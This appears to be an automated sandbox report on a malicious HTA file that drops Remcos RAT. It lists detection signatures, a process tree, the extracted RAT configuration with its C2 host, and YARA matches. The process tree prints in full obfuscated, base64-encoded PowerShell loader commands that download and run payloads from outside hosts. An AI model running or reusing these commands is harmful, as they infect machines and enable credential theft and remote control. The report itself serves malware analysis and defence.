Edit tour

Windows Analysis Report
creamkissingthingswithcreambananapackagecreamy.hta

Overview

General Information

Sample name:	creamkissingthingswithcreambananapackagecreamy.hta
Analysis ID:	1574256
MD5:	049640aa09b45f8f374ec9fff6e272e5
SHA1:	ca0990ea3db24491c5a5ce408b921383b0d74db8
SHA256:	277bce05fe87b2c2edd725dc6bc75c98a9f3d3fc68159a65471625009fe0e9e7
Tags:	htauser-abuse_ch
Infos:

Detection

Cobalt Strike, Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)

Detected Cobalt Strike Beacon

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Suricata IDS alerts for network traffic

Yara detected Powershell decode and execute

Yara detected Powershell download and execute

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

Yara detected obfuscated html page

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Connects to a pastebin service (likely for C&C)

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Delayed program exit found

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

PowerShell case anomaly found

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: WScript or CScript Dropper

Suspicious command line found

Suspicious execution chain found

Suspicious powershell command line found

Uses dynamic DNS services

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Compiles C# or VB.Net code

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 7156 cmdline: mshta.exe "C:\Users\user\Desktop\creamkissingthingswithcreambananapackagecreamy.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

cmd.exe (PID: 5260 cmdline: "C:\Windows\system32\cmd.exe" "/C PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1488 cmdline: PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

csc.exe (PID: 6080 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 5396 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5305.tmp" "c:\Users\user\AppData\Local\Temp\yy1wu0jg\CSCCF35FBE9A0D8429B84CE9BA7B3CB93B6.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

wscript.exe (PID: 6500 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS" MD5: FF00E0480075B095948000BDC66E81F0)

powershell.exe (PID: 6556 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleate MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

CasPol.exe (PID: 6284 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["newglobalfucntioninside.duckdns.org:14646:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-PVMSPM", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
creamkissingthingswithcreambananapackagecreamy.hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6f8:$a1: Remcos restarted by watchdog! 0x6bc70:$a3: %02i:%02i:%02i:%03i
0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x65994:$str_a1: C:\Windows\System32\cmd.exe 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65a04:$str_b2: Executing file: 0x6683c:$str_b3: GetDirectListeningPort 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66380:$str_b7: \update.vbs 0x65a2c:$str_b9: Downloaded file: 0x65a18:$str_b10: Downloading file: 0x65abc:$str_b12: Failed to upload file: 0x66804:$str_b13: StartForward 0x66824:$str_b14: StopForward 0x662d8:$str_b15: fso.DeleteFile " 0x6626c:$str_b16: On Error Resume Next 0x66308:$str_b17: fso.DeleteFolder " 0x65aac:$str_b18: Uploaded file: 0x65a6c:$str_b19: Unable to delete: 0x662a0:$str_b20: while fso.FileExists(" 0x65f49:$str_c0: [Firefox StoredLogins not found]
0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65880:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65810:$s1: CoGetObject 0x65824:$s1: CoGetObject 0x65840:$s1: CoGetObject 0x6f470:$s1: CoGetObject 0x657d0:$s2: Elevation:Administrator!new:
00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b0c8:$a1: Remcos restarted by watchdog! 0x6b640:$a3: %02i:%02i:%02i:%03i
0000000C.00000002.4561290928.0000000001068000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x138ed8:$a1: Remcos restarted by watchdog! 0x139450:$a3: %02i:%02i:%02i:%03i
Process Memory Space: powershell.exe PID: 6556	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 6556	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: powershell.exe PID: 6556	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: powershell.exe PID: 6556	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: powershell.exe PID: 6556	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x10f280:$a1: Remcos restarted by watchdog! 0x11af68:$a1: Remcos restarted by watchdog! 0x10f7dd:$a3: %02i:%02i:%02i:%03i 0x10fb95:$a3: %02i:%02i:%02i:%03i 0x11b4c5:$a3: %02i:%02i:%02i:%03i 0x11b87d:$a3: %02i:%02i:%02i:%03i
Process Memory Space: powershell.exe PID: 6556	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x105b:$b2: ::FromBase64String( 0x9b68:$b2: ::FromBase64String( 0x17232:$b2: ::FromBase64String( 0x1789c:$b2: ::FromBase64String( 0x2a582:$b2: ::FromBase64String( 0x2abec:$b2: ::FromBase64String( 0x3cd426:$b2: ::FromBase64String( 0x3ce2e7:$b2: ::FromBase64String( 0x3d089f:$b2: ::FromBase64String( 0x3d0f09:$b2: ::FromBase64String( 0x9e13a3:$b2: ::FromBase64String( 0x9e4d30:$b2: ::FromBase64String( 0xa49a03:$b2: ::FromBase64String( 0xa4b0a4:$b2: ::FromBase64String( 0xa4b70e:$b2: ::FromBase64String( 0xa6a756:$b2: ::FromBase64String( 0xa6a7c2:$b2: ::FromBase64String( 0x103a:$b3: ::UTF8.GetString( 0x9b47:$b3: ::UTF8.GetString( 0x17211:$b3: ::UTF8.GetString( 0x1787b:$b3: ::UTF8.GetString(
Process Memory Space: CasPol.exe PID: 6284	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: CasPol.exe PID: 6284	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: CasPol.exe PID: 6284	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: CasPol.exe PID: 6284	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x90ba:$a1: Remcos restarted by watchdog! 0x9617:$a3: %02i:%02i:%02i:%03i 0x99cf:$a3: %02i:%02i:%02i:%03i
Click to see the 20 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
12.2.CasPol.exe.400000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
12.2.CasPol.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
12.2.CasPol.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
12.2.CasPol.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6f8:$a1: Remcos restarted by watchdog! 0x6bc70:$a3: %02i:%02i:%02i:%03i
12.2.CasPol.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x65994:$str_a1: C:\Windows\System32\cmd.exe 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65a04:$str_b2: Executing file: 0x6683c:$str_b3: GetDirectListeningPort 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66380:$str_b7: \update.vbs 0x65a2c:$str_b9: Downloaded file: 0x65a18:$str_b10: Downloading file: 0x65abc:$str_b12: Failed to upload file: 0x66804:$str_b13: StartForward 0x66824:$str_b14: StopForward 0x662d8:$str_b15: fso.DeleteFile " 0x6626c:$str_b16: On Error Resume Next 0x66308:$str_b17: fso.DeleteFolder " 0x65aac:$str_b18: Uploaded file: 0x65a6c:$str_b19: Unable to delete: 0x662a0:$str_b20: while fso.FileExists(" 0x65f49:$str_c0: [Firefox StoredLogins not found]
12.2.CasPol.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65880:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65810:$s1: CoGetObject 0x65824:$s1: CoGetObject 0x65840:$s1: CoGetObject 0x6f470:$s1: CoGetObject 0x657d0:$s2: Elevation:Administrator!new:
12.2.CasPol.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
12.2.CasPol.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
12.2.CasPol.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
12.2.CasPol.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
12.2.CasPol.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
12.2.CasPol.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
8.2.powershell.exe.90965d0.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
8.2.powershell.exe.90965d0.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
8.2.powershell.exe.90965d0.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
8.2.powershell.exe.90965d0.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
8.2.powershell.exe.90965d0.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
